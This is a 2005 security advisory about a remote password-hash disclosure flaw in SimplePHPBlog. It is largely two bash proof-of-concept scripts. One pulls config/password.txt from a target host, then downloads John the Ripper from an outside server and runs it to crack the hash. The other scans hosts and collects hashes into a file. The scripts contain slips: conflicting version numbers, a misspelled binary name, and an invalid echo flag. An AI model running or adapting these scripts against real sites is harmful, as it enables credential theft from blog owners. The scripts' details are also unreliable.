SimplePHPBlog 0.4.0 <= Remote Password Disclosure
__ .__
______ |__|_____ | | ___.__.
\____ \ | \____ \| |< | |
| |_> > | | |_> > |_\___ |
| __/\__| | __/|____/ ____|
|__| \______|__| \/ Where is the security? ...
Security Advisory 2005-0x00
Authors......... pjphem && LazyCrs
Date............ 07/07/2005
Vendor.......... www.simplephpblog.com
Type............ SimplePHPBlog 0.4.0 <= Remote Password Disclosure
o The Problem:
--------------
bash-3.00# cat install02.php
$result = create_folder( 'config' );
bash-3.00# cat sb_login.php
// If there's no password file then need to redirect them.
$passFile = 'config/password.txt';
----------------------------------------------------------------------------------------
function create_password ( $user, $pass ) {
// Generate and store password hash
$mypasswd = $user.$pass;
$hashed = crypt($mypasswd);
// Save File
$filename = 'config/password.txt';
$result = sb_write_file( $filename, $hashed );
----------------------------------------------------------------------------------------
function check_password ( $user, $pass ) {
// Check password against hashed password file
$passFile = 'config/password.txt';
$hashed = sb_read_file( $passFile );
bash-3.00# ls -l `pwd` |grep config
drwxrwxrwx 2 www-data www-data 216 Jul 7 01:13 config
o Proof of concept:
-------------------
bash-3.00$ cat 0xfuck-phpblog.sh
#!/bin/bash
###################################################################
#
# 0xfuck-phpblog.sh - SimplePHPBlog Remote Password Disclosure. (for dummy)
#
# 0xpjply CONFIDENTIAL - SOURCE MATERIALS
#
# This is published proprietary source code of 0xpjply
#
# (C) COPYRIGHT 0xpjply security guru group, 2005
# All Rights Reserved
#
# dummy exploit written by pjphem && infected on July 2005
#
###################################################################
# contact:
# pjphem && LazyCrs
#
# pjphem@xxxxxxxx && fLazyCrs@xxxxxxxxx
#
#Greetz:
#
# You think you know? You have no idea!
# fluffi-
#
#
#
# RAFA FREE
#
###################################################################
echo ""
echo ""
echo " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ "
echo " =: SimplePHPBlog Remote Password Disclosure. - for dummy := "
echo " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ "
echo ""
echo " c0de by pjphem "
echo ""
echo ""
echo " vulnerabili Simple php blog 0.4.4 <= "
echo ""
echo ""
echo -n "inserisci un hostname: " ; read hostname ;
echo -n "inserisci dir: " ; read dir ;
echo ""
echo "[*] praparando l'ambiente..."
mkdir 0xpjply
cd 0xpjply
echo -t3 "[*] OK!"
echo "[*] Cattura password..."
wget http://$hostname/$dir/config/password.txt
echo "[*] OK!"
echo ""
echo ""
echo "Show password: (md5)"
echo ""
cat password.txt
echo ""
rm -rf password.txt
echo ""
echo -n "Downloading John The Ripper (password decripter) ?? [Y/n] "
read Q
if [ $Q = y ];
then echo "[*] OK!" ; wget http://broly.xelon.it/adv/john.tar.gz
else
exit 1;
fi
tar -zxf john.tar.gz
cd john
echo ""
echo "[*] Dowloading password.."
echo ""
wget http://$hostname/$dir/config/password.txt
echo ""
echo "Done!"
echo ""
echo "STARING John for decript password.. enJoy"
./jonh password.txt
echo ""
echo ""
bash-3.00$
bash-3.00$ cat 0xfuck-phpblog-scanner.sh
#!/bin/bash
#
# Simple tester for phpblog
#
# phpblog 0.4.4 <=
#
#######################################
echo "host , directory blog: (ex. test.it blog)"
read HOST BLOG
lynx -source http://$HOST/$BLOG/config/password.txt | grep $1$ >> 0wn4bl3
bash-3.00$
---------------------------------------------------------------
Scegli il tuo dominio preferito e attiva la tua email! Da oggi
l'eMail di superEva e' ancora piu' veloce e ricca di funzioni!
http://webmail.supereva.it/new/
---------------------------------------------------------------